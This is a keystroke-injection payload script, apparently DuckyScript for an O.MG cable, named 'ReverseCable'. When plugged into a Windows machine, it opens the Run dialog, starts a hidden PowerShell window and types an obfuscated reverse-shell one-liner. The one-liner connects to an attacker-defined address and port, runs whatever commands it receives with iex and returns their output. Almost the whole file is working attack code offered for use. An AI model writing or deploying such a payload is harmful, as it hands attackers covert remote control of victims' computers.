REM       ReverseCable
REM       Version 2.0
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM       Author: 0iphor13
REM       Requirements: Firmware Version 3.0 or higher

REM       TCP Reverse shell, based on ReverseDuckyII, executed in the background
REM       Define your address and port below, start a listener and receive the connection after successful execution

REM Address and Port of receiving Host
DEFINE #ADDRESS '0.0.0.0'
DEFINE #PORT 4444

REM Define your Keymap below
DUCKY_LANG de
DELAY 1500
GUI r
DELAY 500
STRINGLN powershell -NoP -NonI -w H

DELAY 250
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt(#ADDRESS,#PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$
DELAY 100
STRING s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oU
DELAY 100
STRINGLN t-STriNG);$x=$z+"O.MG@PS "+(pwd)+">";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exIt
CAPSLOCK
DELAY 100
CAPSLOCK
DELAY 100
CAPSLOCK
DELAY 100
CAPSLOCK

